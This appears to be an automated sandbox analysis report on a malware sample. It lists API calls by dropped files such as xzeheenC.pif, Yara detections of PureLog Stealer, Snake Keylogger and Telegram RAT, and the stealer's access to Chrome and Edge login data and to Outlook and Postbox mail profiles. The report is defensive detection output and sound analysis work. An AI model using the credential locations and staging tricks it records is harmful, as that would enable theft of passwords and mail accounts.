              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF7AB1351EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF7AB133140
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,6_2_00007FF7AB1351EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,6_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,6_2_00007FF7AB133140
              Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,7_2_00007FF792E03800
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_028F5A78
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: GetLocaleInfoA,10_2_028FA798
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: GetLocaleInfoA,10_2_028FA74C
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_028F5B84
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF7AB1351EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF7AB133140
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,12_2_00007FF7AB1351EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,12_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,12_2_00007FF7AB133140
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB148654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF7AB148654
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF950C ConvertStringSidToSidW,LookupAccountNameW,GetLastError,#359,LocalAlloc,#357,LocalAlloc,LookupAccountNameW,GetLastError,IsValidSid,ConvertSidToStringSidW,GetLastError,LocalFree,LocalFree,7_2_00007FF792CF950C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB12586C GetVersion,4_2_00007FF7AB12586C
              Source: C:\Users\Public\Libraries\xzeheenC.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 22.2.xzeheenC.pif.33966478.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2dcd0f08.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.226c0f08.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34ca0f08.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2dcd0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.xzeheenC.pif.2991aba0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c596478.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.25170000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c5ce790.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.226c0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.222bb98e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2dcd0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34ca0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34d20000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3255b98e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3255c896.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.222bc896.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.222bb98e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34d20000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3399e790.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.237be790.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2b37c896.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.237be790.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.3.xzeheenC.pif.2072dd00.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.3.xzeheenC.pif.30aaea30.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.33965570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c595570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.222bc896.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2b37b98e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.23786478.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2b37b98e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.226c0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3399e790.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.25170000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.23785570.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3255b98e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34ca0f08.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2dcd0f08.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.23786478.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2e330000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.226c0f08.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.33965570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.23785570.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.3.xzeheenC.pif.2072dd00.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34ca0000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3255c896.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c595570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.33966478.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.3.xzeheenC.pif.30aaea30.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B61B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.00000000229ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032A86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.00000000229B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032ECC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTR
              Yara detected Telegram RAT
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\Public\Libraries\xzeheenC.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\Public\Libraries\xzeheenC.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\Public\Libraries\xzeheenC.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Users\Public\Libraries\xzeheenC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Users\Public\Libraries\xzeheenC.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Users\Public\Libraries\xzeheenC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 22.2.xzeheenC.pif.33966478.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2dcd0f08.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.226c0f08.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34ca0f08.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2dcd0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.xzeheenC.pif.2991aba0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c596478.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.25170000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c5ce790.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.226c0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.222bb98e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2dcd0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34ca0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34d20000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3255b98e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3255c896.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.222bc896.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.222bb98e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34d20000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3399e790.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.237be790.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2b37c896.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.237be790.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.3.xzeheenC.pif.2072dd00.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.3.xzeheenC.pif.30aaea30.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.33965570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c595570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.222bc896.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2b37b98e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.23786478.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2b37b98e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.226c0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3399e790.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.25170000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.23785570.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3255b98e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34ca0f08.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2dcd0f08.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.23786478.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2e330000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.226c0f08.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.33965570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.xzeheenC.pif.23785570.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.3.xzeheenC.pif.2072dd00.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.34ca0000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.xzeheenC.pif.3255c896.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.xzeheenC.pif.2c595570.5.raw.unpack, type: UNPACKEDPE
